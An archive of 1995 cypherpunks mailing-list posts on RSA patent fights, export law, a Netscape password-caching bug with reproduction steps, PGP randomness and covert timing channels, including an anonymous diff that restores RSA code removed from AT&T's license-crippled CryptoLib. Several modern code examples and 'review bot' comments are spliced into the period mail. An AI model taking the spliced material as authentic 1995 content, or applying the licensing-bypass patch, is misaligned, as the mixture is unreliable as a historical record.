> back-of-the-envelope calculation has it cracking one key every
> .75 days on the average.

This sounds pretty pessimistic too...

> thad

> -- Thaddeus Beier                   email:  thad@hammerhead.com
>    Technology Development             vox:  408) 286-3376
>    Hammerhead Productions             fax:  408) 292-2244
> 
> ----------

Well... maybe the timing wasn't right for the system's completion.
After all, designing a computer with <1 nanosecond cycle time is not
child's play. And in quantity it is even more difficult. A few more
years of development with Transphaser logic and Holographic storage
could work some wonders in computational capabilities.

Anitro





- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNXt+SoZzwIn1bdtAQEQAQF/YKCYcSiH4BRswP7+4Sv1VIYynpH738vF
LFa/31pQBJiEkmkpiykmOcL3YySghGsf
=3nUQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 19 Dec 1995 11:58:27 +0800
To: trei@process.com>
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b
In-Reply-To: <9512190026.AA15461@toad.com>
Message-ID: <Pine.ULT.3.91.951218173620.29934E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Except for the bit about the file not being deleted after quitting
Netscape (which is Bad), this is old news. This is why security-conscious
sites like banking.wellsfargo.com ask for passwords in an SSL-encrypted
form rather than via simple browser authentication. 

Even if Netscape did delete the "password cache," anyone with physical 
access to your machine could still recover it from disk.

I believe that Microsoft Internet Explorer and other browsers derived from
Mosaic do the same thing. 

Netscape et al know that simple browser authentication is of limited 
usefulness, which is why we keep trying to commit them to DCE.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Tue, 19 Dec 1995 10:27:18 +0800
To: cypherpunks@toad.com
Subject: RSA Data v. Cylink hearing
Message-ID: <rschlafly3530146400>
MIME-Version: 1.0
Content-Type: text/plain


Another hearing in the public-key patent saga.

Cylink/CKC is going for a preliminary injunction against RSA Data
for contributory infringement of the Stanford patents.

RSA Data has a license to the Stanford patents, but has no sublicensing
authority.  It has been selling RSA & Diffie-Hellman toolkits and
telling customers that they don't need PKP or Stanford patent
licenses, and even indemnifying those customers against a patent
infringement claim.

An arbiter has already ruled that RSA Data's license does not cover
customers shipping products.

Of course I take the position that these patents are invalid, and
now that Bidzos has lost control of them, he suddenly agrees with me.
(Sorry, no ruling yet in my case.  Stay tuned.)  But RSA Data lawyers
will have to stand up in court and say that after enforcing the
Stanford patent against all public-key users for 5 years, RSA Data
suddenly had a revelation that the Stanford patents are invalid
after all.  It should be amusing.

2:00 pm, Thurs., Jan. 4, 1996
RSA Data v. Cylink/CKC, Case C-95-03256 WHO
SF Federal Bldg, court #7, Judge Orrick
450 Golden Gate Ave
Directions: Take 9th up from Market -- it turns into Larkin and
the federal bldg is on the corner with Golden Gate Ave.
docket clerk: 415-522-2060

Roger Schlafly

	phone: 408-476-3550
	CompuServe: 76646,323
	US Mail: PO Box 1680, Soquel, CA 95073 USA
	Internet: rschlafly@attmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 19 Dec 1995 09:32:23 +0800
To: cypherpunks@toad.com
Subject: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b
Message-ID: <9512190026.AA15461@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Haven't had time to test this myself.

Peter Trei

------- Forwarded Message Follows -------
Date:          Mon, 18 Dec 95 17:18:28
From:          <lstein@genome.wi.mit.edu>
Subject:       SECURITY ALERT: Password protection bug in Netscape 2.0b3
To:            www-security@ns2.rutgers.edu, jcarroll@redman.canada.dg.com
Cc:            tara@linkage.cpmc.columbia.edu

A potentially serious bug has just come to my attention concerning the
handling of password-protected pages accessed via Netscape 2.0b3.
Apparently when you type in the password to access a protected document
Netscape stores the password in a local hidden file (in one of the .db
files created in the .netscape directory on UNIX systems, and in the
Netscape Preferences file on Macintoshes).  This password is then used for
accessing the document during subsequent accesses.  The problem is that
Netscape does not delete the stored password when the program quits.

The problem has been reproduced on Unix and Macintosh platforms.  I haven't
tried the Windows implementation yet, but I suspect the same problem
exists.

This leads to the following behavior:

        1) Open up Netscape and access a password-protected document.
        2) Quit Netscape
        3) Start Netscape again and try to retrieve the document.  When the
                password-entry dialog comes up, click "Cancel".
        4) Try to access the document a second time.  Now Netscape lets you
                in without asking for the password!

On Unix systems, this means that if you go over to an associate's machine to
show him a protected document, Netscape will record your typed-in password
for posterity.  Your associate now has full access to this page.

The situation is particularly dangerous on PCs in a shared "computer lab"
environment.  Everybody who uses Netscape unwittingly makes his passwords
available to all other users.

Please let me know if anyone finds out more about this problem.  I'm going
to add it to the WWW security FAQ.

Lincoln

========================================================================
Lincoln Stein, M.D.,Ph.D.                       lstein@genome.wi.mit.edu
Director: Informatics Core
MIT Genome Center                               (617) 252-1916
Whitehead Institute for Biomedical Research     (617) 252-1902 FAX
One Kendall Square
Cambridge, MA 02139
=================http://www-genome.wi.mit.edu/~lstein====================
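
An added example, not part of Lincoln Stein's report or of any Netscape code: one way to check a browser profile for the behaviour reported above is to log in to a test page with a throwaway canary password, quit the browser, and scan the profile directory for that password. The encodings searched for, the canary credential and the file names are assumptions constructed for this example; the report does not say how Netscape 2.0b3 encodes the stored password.

```python
import base64
import os
import tempfile

# Constructed canary credential: a throwaway value typed into a test page only.
CANARY_USER = "audit"
CANARY_PASSWORD = "canary-7f3a-not-a-real-secret"


def credential_encodings(user, password):
    """Byte patterns a remembered HTTP password could take on disk (assumed set)."""
    return {
        "plaintext password": password.encode(),
        "utf-16le password": password.encode("utf-16-le"),
        # HTTP Basic authentication sends base64("user:password").
        "basic-auth base64": base64.b64encode(f"{user}:{password}".encode()),
    }


def find_in_file(path, needles, chunk_size=1 << 20):
    """Return sorted (label, offset) hits, reading in chunks so large files are fine."""
    overlap = max(len(n) for n in needles.values()) - 1
    hits = set()
    with open(path, "rb") as fh:
        buf, pos = b"", 0  # pos is the file offset of buf[0]
        while True:
            chunk = fh.read(chunk_size)
            if not chunk:
                break
            buf += chunk
            for label, needle in needles.items():
                i = buf.find(needle)
                while i != -1:
                    hits.add((label, pos + i))
                    i = buf.find(needle, i + 1)
            # Keep a tail so a match straddling two chunks is still found.
            keep = buf[-overlap:] if overlap else b""
            pos += len(buf) - len(keep)
            buf = keep
    return sorted(hits)


def scan_profile(root, user, password):
    """Walk a profile directory; return (relative path, encoding, offset, exposed).

    'exposed' is True when the file's mode grants read access to group or other,
    which is the shared-machine case the report warns about.
    """
    needles = credential_encodings(user, password)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                exposed = bool(os.stat(path).st_mode & 0o044)
                for label, offset in find_in_file(path, needles):
                    findings.append((os.path.relpath(path, root), label, offset, exposed))
            except OSError:
                continue  # unreadable file: nothing to report for it
    return sorted(findings)


def demo():
    """Build a constructed profile directory, scan it, and return the findings."""
    needles = credential_encodings(CANARY_USER, CANARY_PASSWORD)
    with tempfile.TemporaryDirectory() as root:
        samples = {  # constructed file names and contents, not real Netscape files
            "cache_constructed.db": (
                0o644,
                b"\x00\x01\x02realm=test\x00Authorization: Basic "
                + needles["basic-auth base64"] + b"\x00\xff",
            ),
            "prefs_constructed": (
                0o600,
                b"last_password=" + needles["plaintext password"] + b"\n",
            ),
            "bookmarks_constructed.html": (0o644, b"<html>no secrets here</html>"),
        }
        for name, (mode, data) in samples.items():
            path = os.path.join(root, name)
            with open(path, "wb") as fh:
                fh.write(data)
            os.chmod(path, mode)
        return scan_profile(root, CANARY_USER, CANARY_PASSWORD)


if __name__ == "__main__":
    for rel, label, offset, exposed in demo():
        note = "readable by other users" if exposed else "owner-only"
        print(f"{rel}: {label} at byte {offset} ({note})")
```

Against a real profile, call scan_profile(path, user, password) after the browser has exited; any hit means the canary outlived the session, and a hit flagged as exposed is readable by other accounts on the machine.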







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 19 Dec 1995 21:02:52 +0800
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program [NOISE]
Message-ID: <199512190442.UAA14637@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I was going to refrain from ranting on this one (for once:-) but 
a couple points with cypherpunks relevance have come up.
One is that PACs are, in some sense, a donation-remailer.  
The purpose is to get the money to its destination while
obfuscating the link between the donor and the candidate,
while allowing the PACs to take the political heat for it,
but giving them the out that "it's just being done on behalf 
of our fine upstanding donors."

At 11:20 AM 12/18/95 -0500, Phill Hallam wrote (order rearranged somewhat):
>The starting point for campaign reform has to be to cap the amount that can be 
>spent on a campaign. Most countries have such laws to prevent the political 
>process from being owned by the rich. Unfortunately this has happened in the US
>with the effect that both parties are much further to the right than in any 
>other Western democracy. 

I happen to believe in freedom of speech, especially political speech,
and if you're not allowed to spend money broadcasting your speech or
printing your messages, you don't have much freedom of press or speech.
In this case, technology is giving us the ability to not only support
freedom of speech, but give it as little or as much visible linkage as desired,
allow the money to be passed around privately, and also to coordinate
publicity efforts of different groups in ways other than simply giving
cash to a candidate's bagman to be spent on publicity.  It's also
significantly changing the costs, speed, and targetability of speech,
allowing more people to get involved, and allowing low-cost efforts
to have more impact by reaching the right people.

And as far as "prevent the political process from being owned by the rich" 
goes, there have been brief exceptions over the last 5000 years in which
the less-rich have overthrown the rich, but campaign finance laws have almost
never kept the rich or the politicians from helping each other out.

>The main problem with anonymous political donations is that it is easy enough to
>create linkage if the recipient and the donor conspire together. 

That's a given; not much point in giving someone a bribe if they don't know
what they're being bribed to do or who they're doing it for :-)

>There are many other things that campaign laws are intended to achieve beyond 
>avoiding bribery. For example foreign nationals cannot make donations to US 
>parties. It would be a good thing if there were similar laws in the UK since at
>the last election a foreign national with links to organised crime allegedly
>made a multi million donation to the Conservative party. 

I also don't believe freedom of speech should be limited by national boundaries.

>Of course in the absence of full disclosure of details of party records
> nobody can be sure. We are as voters entitled to consider the worst however.

You can always agree not to vote for any candidate or party that doesn't
provide full disclosure, though it's a little harder to deal with political
publicity supporting a candidate provided directly by non-candidates.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
# .... Heading back to The Big Phone Company





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 19 Dec 1995 21:03:07 +0800
To: cypherpunks@toad.com
Subject: New additions (12/18) for Karn vs State Dept
Message-ID: <199512190443.UAA23762@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


I've just received, HTMLized and added two new documents to the web page
concerning my case against the State Dept. They are:

http://www.qualcomm.com/people/pkarn/export/karnsf.html (Joint Statement
of Facts Not In Dispute, 12/18/95) and

http://www.qualcomm.com/people/pkarn/export/repmem.html (Reply
Memorandum In Further Support of Defendants' Motion to Dismiss, Or In
the Alternative, For Summary Judgment 12/18/95)

As before, the base URL for the case is

http://www.qualcomm.com/people/pkarn/export

I'd like to thank the government's attorneys at the Department of
Justice for this time providing an electronic copy of their filing to
my attorneys. This made it easier for me to bring it to you on the
web.

Last time I scanned in the government's documents on an OCR system,
the same one I used to scan in the 3DES code in Applied Cryptography
to demonstrate the process as part of my declaration.

However, I still had to convert the text files from WordPerfect to
ASCII and then HTMLize them by hand. If you find any formatting
errors, please let me know so I can fix them.

--Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 19 Dec 1995 11:32:52 +0800
To: dklur@dttus.com (David Klur)
Subject: Re: redirect of newsgroups
In-Reply-To: <9511188193.AA819305757@cc2.dttus.com>
Message-ID: <199512190221.VAA20286@homeport.org>
MIME-Version: 1.0
Content-Type: text


Yeah, buy an account on a local ISP, or on C2, got.net, or some other
cypherpunk run/supporting business.

Adam


|      For those of us sitting behind a firewall that blocks out all of the 
|      alt, rec, etc.. newsgroups...is there another way to access these 
|      groups?  For example, redirecting the contents of alt.2600 to, say, 
|      comp.2600 (because this firewall allows the comp.xxx groups through).  
|      Or any other hacks around this inconvenience?

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 1995 13:02:43 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfb7cab020210041061@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:15 PM 12/18/95, Derek Atkins wrote:
>Correction of another detail:
>
>> > tcmay@got.net (Timothy C. May) writes:
>> > When you've done this, and concluded that RSA-129 could be done in, say, X
>> > minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT
>> > group), and on to the 1024- and 2048-bit keys. Tell us how many years or
>> > centuries it will take. (Hint: Rivest and Schneier have done these
>
>RSA-129 is 129 decimal digits, not 129 bits.  This computes to about
>425 bits, which is actually more difficult than the 384-bit Blacknet
>key.

I'm not having much luck on this example, am I? The RSA-129 I remembered
correctly as being 129 decimal digits, but I spaced out on the 384-bit key
and mislabelled it as "RSA-384."

It'll be _many_ years before a 384-decimal-digit number is factored, I
suspect. Let alone a 600-digit modulus, with or without the mysterious
"transphaser" technology mentioned by Anitro.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Tue, 19 Dec 1995 11:50:59 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512182157.VAA32380@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Submitted for your approval...

The recent CryptoLib, offered by the nice folks at AT&T (Written by Jack
Lacy and Don Mitchell), has a small problem: folks without RSA licenses are
given a crippled version without functional RSA code. It sucks, but they 
must cover their collective asses.

That small problem has now been rectified.  

Is CryptoLib available overseas yet?

================================CUT HERE===================================

*** -	Sun Dec 17 20:05:50 1995
--- rsa.c	Sun Dec 17 20:05:36 1995
***************
*** 411,421 ****
  #endif
  {
  	BigInt result;
! 	fprintf(stderr, "RSA encryption not supported without license.\n");
! 	result = bigInit(0);
  	return result;
  }
- 
  #ifdef K_AND_R
  _TYPE( BigInt )
  RSADecrypt(message, key)
--- 411,420 ----
  #endif
  {
  	BigInt result;
!         result = bigInit(0);
!         bigPow(message, key->publicExponent, key->modulus, result);
  	return result;
  }
  #ifdef K_AND_R
  _TYPE( BigInt )
  RSADecrypt(message, key)
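Review bot: in RSAEncrypt the new `bigPow(message, key->publicExponent, key->modulus, result)` call uses `message` and `key` exactly as passed in, with no check that `key` is non-null or that `message` is smaller than `key->modulus`; an out-of-range message would be reduced modulo the modulus and would not decrypt back to the original. Suggest rejecting such input before the call, or documenting that the caller guarantees it. The two added lines are also indented with spaces where the surrounding lines use tabs, and the hunk drops the blank line that separated this function from the following `#ifdef K_AND_R`.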
***************
*** 427,434 ****
  #endif
  {
  	BigInt result;
! 	fprintf(stderr, "RSA decryption not supported without license.\n");
! 	result = bigInit(0);
  	return result;
  	
  }
--- 426,433 ----
  #endif
  {
  	BigInt result;
!         result = bigInit(0);
!         chineseRemTheorem(message, key, result);
  	return result;
  	
  }
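Review bot: in RSADecrypt, `chineseRemTheorem(message, key, result)` is handed the whole key with no check that it actually carries the private components the CRT path needs, so a public-only key would reach the private-key code; validate the key and fail explicitly instead of returning whatever `result` then holds. Nothing in the hunk blinds `message` before the private-key operation either, so its running time depends directly on caller-supplied input; consider blinding here or documenting that the callee does it. As in the previous hunk, the added lines are indented with spaces rather than the file's tabs.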





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 19 Dec 1995 16:12:02 +0800
To: Russ Cooper <rcooper@the-wire.com>
Subject: RE: Political Cleanup program
Message-ID: <m0tRvJf-0008zdC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:09 PM 12/17/95 -0500, you wrote:
>A much simpler solution might be to just force all politicians to give up 
>their campaign funds when they retire, or even better, immediately 
>following the elections. Today, whatever is left in their campaign funds 
>are given over to them when they retire or are forced out of office, on top 
>of their lucrative pensions.
>
For Congress, I think this changed a few years ago.  Before a certain date,
retiring Congressmen could convert unused campaign funds to their own money.
At some point they changed the rules, and that is no longer the case.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 19 Dec 1995 17:49:16 +0800
To: trei@process.com
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b
In-Reply-To: <9512190026.AA15461@toad.com>
Message-ID: <30D65A4B.7ED1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


This report is mostly bogus.  Netscape does not, and never
has stored http auth passwords in files on your disk.  However
we do cache documents from servers that use http auth.
In this case the user had their preferences set to check the
host site for updated content "once per session".  There is
a bug, which we are fixing before 2.0 ships, that if the
auth fails the document should be removed from the cache but
was not. If the user had set their cache checking to "never",
then if the document is in the cache, it will always be shown to
the user, since no connection is made to the server.

  Content providers who don't want their web pages cached
should use the 'Pragma: no-cache' http header.  This will
tell the navigator to not save the document in the disk cache.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
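
The advice above, as an added illustration (not Netscape's or the poster's code): a small Python handler for a page behind HTTP Basic auth that marks every response, including the 401, as uncacheable. `Pragma: no-cache` is the header named in the message; `Cache-Control: no-store`, the credentials, the realm and the port are assumptions made for this example.

```python
import base64
import hmac
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed demo credentials (assumption, not from the original message).
USERS = {"alice": "correct horse"}

# Headers asking browsers and proxies not to keep a copy of the response.
NO_CACHE_HEADERS = [
    ("Pragma", "no-cache"),         # HTTP/1.0 header named in the message
    ("Cache-Control", "no-store"),  # HTTP/1.1 counterpart (added assumption)
]


def check_basic_auth(header_value):
    """Return True if an Authorization header carries valid Basic credentials."""
    if not header_value or not header_value.startswith("Basic "):
        return False
    try:
        decoded = base64.b64decode(header_value[6:], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return False  # not base64, or not text
    user, sep, password = decoded.partition(":")
    expected = USERS.get(user)
    if not sep or expected is None:
        return False
    # Constant-time comparison of the supplied and stored passwords.
    return hmac.compare_digest(password.encode(), expected.encode())


def build_response(authorization):
    """Return (status, headers, body) for the protected page."""
    if check_basic_auth(authorization):
        status, body = 200, b"members-only content\n"
        headers = [("Content-Type", "text/plain")]
    else:
        status, body = 401, b"authentication required\n"
        headers = [("Content-Type", "text/plain"),
                   ("WWW-Authenticate", 'Basic realm="demo"')]
    # Mark success and failure alike, so no copy of the protected document
    # is left in a disk cache to be shown later without contacting the server.
    return status, headers + NO_CACHE_HEADERS, body


class ProtectedHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, headers, body = build_response(self.headers.get("Authorization"))
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Local-only listener for trying the handler with a browser or curl.
    HTTPServer(("127.0.0.1", 8080), ProtectedHandler).serve_forever()
```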




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 19 Dec 1995 13:41:40 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: PGP's randpool()
Message-ID: <199512190326.WAA20676@homeport.org>
MIME-Version: 1.0
Content-Type: text



	What does PGP do when it exhausts randpool?

	I've scanned the source, and found some useful tidbits, but
RANDPOOLBITS seems limited to ~408 bytes.  I can invoke commands that
should exhaust PGP's randpool, but don't seem to.  Doing "pgp
+makerandom=4000000 foo" repeatedly seemingly would cause PGP to
prompt me to type in some random stuff, but it doesn't.

	I'm trying to see how pgp reacts to me taking all its random
bytes because I'm writing some shell scripts that use pgp to generate
random passphrases.  (This is a case where I don't think bunches of
system data are enough.)

	(Note to reporters who might be listening: This is a fairly
unusual invocation of PGP where a user would not interact with the
program at all to supply new randomness.  It's not an attack on PGP's
security in any interesting or newsworthy sense.)

random.c:
 * - Every time you run PGP, especially when responding to one of PGP's
 *   prompts, PGP samples the keystrokes for use as random numbers.
 *   It is a shame to throw this entropy (randomness) away just because
 *   there is no need for it in the current invocation of PGP

[... Further down...]

/*
 * Performs an accumulation of random bits.  As long as there are fewer bits
 * in the buffer than are needed (the number passed, plus pending bits),
 * prompt for more.
[heavily cut]

void
trueRandAccum(unsigned count)	/* Get this many random bits ready */
{
LANG("\nWe need to generate %u random bits.  This is done by measuring the\
\ntime intervals between your keystrokes.  Please enter some random text\
\non your keyboard until you hear the beep:\n"), count-trueRandBits);


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 19 Dec 1995 15:39:38 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: Java and timing info - second attempt
In-Reply-To: <9512190402.AA12992@bilbo.suite.com>
Message-ID: <30D65C32.4500@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Miller wrote:
> Would it be possible to create a Java applet that causes the client
> machine to sign or encrypt something with their private key, and then send
> back timing info?
> 
> For the answer to be YES a few things need to be true.  There needs to be
> some sort of standard crypto API in use that can be accessed by a Java
> script, and Java scripts need to be able to capture and send back timing
> info.  Does anyone on this list know enough about Java to know if it can
> do any of these things?

  In Netscape Navigator 2.0 Java and JavaScript do not have access
to crypto routines.  At some point in the future this will probably
change, but only after we understand the implications much better
than we do today.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 1995 17:47:04 +0800
To: cypherpunks@toad.com
Subject: Re: Campaign Finance Reform
Message-ID: <acfb90b504021004c5b3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry that I haven't been following this "Campaign finance reform" thread,
but I did stop to read what Brian Davis said, and his point actually raises
an important game-theoretic issue which we haven't talked about in a while
(maybe because everyone has so internalized it as part of their gestalt
that they see no need to mention it...which I doubt).

At 7:55 PM 12/18/95, Brian Davis wrote:
>On Mon, 18 Dec 1995, jim bell wrote:

>> All of which raises numerous opportunities for sting operations against
>> politicians, done by individuals by procedures provided for under law.
>> Escrow (Okay, I know that's a dirty word around here, but...) an encrypted
>> statement of how you intend to run the sting, to be opened by the escrow
>> agent at some point in the future, explaining who you're going after and
>> how.  Make the contribution, keep evidence, and if you're successful the
>> congressman goes to jail for a few years.
>
>
>The problem with the private investigation is that law enforcement may
>not believe you were an "innocent" citizen conducting an investigation.
>Remember the ABSCAM Congressman who contended he was conducting his own
>investigation ...

The "game-theoretic issue" is that of the "brilliant penny scam,"
well-known to grifters and con artists and cryptographers (and all good
cryptographers should be aware of cons and scams, as cryptography protocols
bear close resemblances to confidence games, or at least must cope with
them).

I claim that I have a "magic penny," or "brilliant penny," which can
predict which way the price of Netscape stock will move on the next day. I
deposit a sealed prediction of what my brilliant penny told me would
happen, with a reputable escrow agent. I invite investors to cast their lot
with me. On each day, I retrieve the sealed prediction and, voila!, it is
confirmed to be the truth.

Obviously, what I have done is to record predictions covering both
outcomes--Netscape going up and going down--but have conveniently only
retrieved the one I know matches the actual outcome.

(Sure, it's possible to think of some ways to get around this. Left as an
exercise for the student.)

The connection with Jim Bell's idea is obvious. Anyone planning a crime,
say, buying drugs (not a crime in my book, but that's another story), cooks
up a strategy to claim he was "investigating how easily drugs may be bought
on the streets of Minneapolis." He seals a letter to himself detailing how
his "expose" is to be run. If caught, he smugly says, "But I'm just doing a
story on how drugs may be bought. You'll find my description of my plans
sealed in an envelope with my lawyer." Not very convincing.

(The reason this is a variant of the brilliant penny scam is that the costs
of making the claim are low, and the ability to selectively reveal forces
the outcomes to match. Not convincing.)


>Escrowing what you intend to do could be seen as blackmail ammunition if
>the Congressman fails to produce.
>
>Unfortunately for the Cryptoanarchists (tm -- in more ways than one),
>absent law enforcement running the "sting" you are taking a risk of being
>stung yourself.


"Escrowing" where the access key is controlled by the party intending to do
something illegal--blackmail, drugs, etc.--falls into the category I just
described.

Though I'm not a lawyer, I rather suspect courts have looked askance at
such "covers of convenience" intended to be used as protection.

By the way, dramatically better protection is gotten--so I understand--if a
"legitimate" reporting assignment is involved. Thus, if a reporter is
assigned by her editor to try to buy a dime bag on the corner of 8th and
Artesia, and she somehow gets caught, adequate proof can be produced to
ensure no prosecution occurs (this obviously depends on a lot of factors).

On the issue of bribing officials, there are of course all sorts of ways to
do this. Outright bribes will always be handled more carefully than "mere"
campaign contributions, which are only quasi-bribes.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
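
One way to "get around" the selective-reveal trick described above, as an added example that is not part of the original post: hash commitments are deposited in a registry that everyone can read, and a reveal is accepted only if the predictor has exactly one commitment on record for that event. The `PublicRegistry` class, the identities, the event label and the predictions are all constructed for illustration.

```python
import hashlib
import hmac
import secrets

NONCE_LEN = 32  # fixed length keeps nonce || prediction unambiguous


def commit(prediction, nonce):
    """Hash commitment: binds to the prediction, hides it until the nonce is shown."""
    return hashlib.sha256(nonce + prediction.encode()).hexdigest()


class PublicRegistry:
    """Append-only log that anyone can read (hypothetical stand-in for an
    escrow agent who publishes how many envelopes each depositor left)."""

    def __init__(self):
        self._log = []        # (predictor, event, commitment) in arrival order
        self._closed = set()  # events whose outcome is already known

    def deposit(self, predictor, event, commitment):
        if event in self._closed:
            raise ValueError("outcome already known; too late to commit")
        self._log.append((predictor, event, commitment))

    def close(self, event):
        self._closed.add(event)

    def commitments(self, predictor, event):
        return [c for p, e, c in self._log if p == predictor and e == event]


def verify_reveal(registry, predictor, event, prediction, nonce, outcome):
    """Accept only a single prior commitment that opens to the real outcome."""
    made = registry.commitments(predictor, event)
    if len(made) != 1:
        # Two envelopes covering both outcomes is the brilliant penny scam.
        return False, f"{len(made)} commitments on record; selective reveal possible"
    if len(nonce) != NONCE_LEN or not hmac.compare_digest(
            made[0], commit(prediction, nonce)):
        return False, "reveal does not open the recorded commitment"
    if prediction != outcome:
        return False, "prediction was wrong"
    return True, "single prior commitment matches outcome"


def demo():
    """Run the scam and an honest prediction against the same registry."""
    reg = PublicRegistry()
    event = "stock-move-day-1"  # constructed label
    # The scammer covers both outcomes and plans to reveal only the winner.
    n_up, n_down = secrets.token_bytes(NONCE_LEN), secrets.token_bytes(NONCE_LEN)
    reg.deposit("penny", event, commit("up", n_up))
    reg.deposit("penny", event, commit("down", n_down))
    # The honest predictor deposits exactly one commitment.
    n_h = secrets.token_bytes(NONCE_LEN)
    reg.deposit("honest", event, commit("up", n_h))
    reg.close(event)
    outcome = "up"
    scam = verify_reveal(reg, "penny", event, "up", n_up, outcome)
    honest = verify_reveal(reg, "honest", event, "up", n_h, outcome)
    return scam, honest


if __name__ == "__main__":
    for name, result in zip(("penny", "honest"), demo()):
        print(name, result)
```

The count is per identity, so the check only helps where creating a second identity is costly; if claims are cheap to make under fresh names, the selective reveal simply moves to the choice of name.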






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 19 Dec 1995 19:06:45 +0800
To: Jeff Weinstein <Jim_Miller@bilbo.suite.com
Subject: Re: Java and timing info - second attempt
Message-ID: <199512190724.XAA10835@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 22:31 12/18/95 -0800, Jeff Weinstein wrote:
>  In Netscape Navigator 2.0 Java and JavaScript do not have access
>to crypto routines.  At some point in the future this will probably
>change, but only after we understand the implications much better
>than we do today.

More importantly for covert channel analysis, do they have access to good
clocks?  Access to a good clock could make a Java applet a good candidate
for the receiver in a generalized covert channel attack.  Access to both
process time and real-world time can give a good indication of load on the
processor, and might be needed for animation.  A transmitter could send by
using or not using the CPU.  (Installing the transmitter is left as an
exercise for the student. ;-) )

Who said that life was safe?


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 19 Dec 1995 16:56:28 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: wish list for Crypto++?
